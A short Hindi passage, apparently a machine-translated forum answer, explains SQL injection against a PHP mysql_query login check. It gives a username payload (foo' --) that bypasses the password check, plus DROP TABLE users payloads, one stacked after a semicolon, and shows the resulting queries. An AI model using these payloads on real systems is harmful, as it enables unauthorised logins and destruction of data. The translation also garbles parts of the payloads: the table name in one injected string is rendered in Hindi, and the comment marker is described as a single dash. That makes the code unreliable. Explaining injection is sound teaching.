कुछ इस तरह करना चाहिए:
- उपयोगकर्ता "foo" के रूप में लॉग इन करने के लिए, उपयोगकर्ता नाम को "foo' -- " . पर सेट करें
इससे आपकी क्वेरी कुछ इस तरह दिखेगी
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
"-" का अर्थ है कि शेष पंक्ति पर टिप्पणी की गई है
- सुनिश्चित नहीं है कि यह काम करेगा, लेकिन उपयोगकर्ता नाम को "foo' OR (DROP TABLE उपयोगकर्ता) पर सेट करने का प्रयास करें -- "
इससे आपकी क्वेरी इस तरह दिखेगी:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
हालांकि यह स्वीकार नहीं हो सकता है - मुझे लगता है कि सबक्वेरी केवल चयन कर सकते हैं।
mysql_query फ़ंक्शन केवल एक क्वेरी चलाएगा - अन्य आपको ऐसा करने देंगे:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");
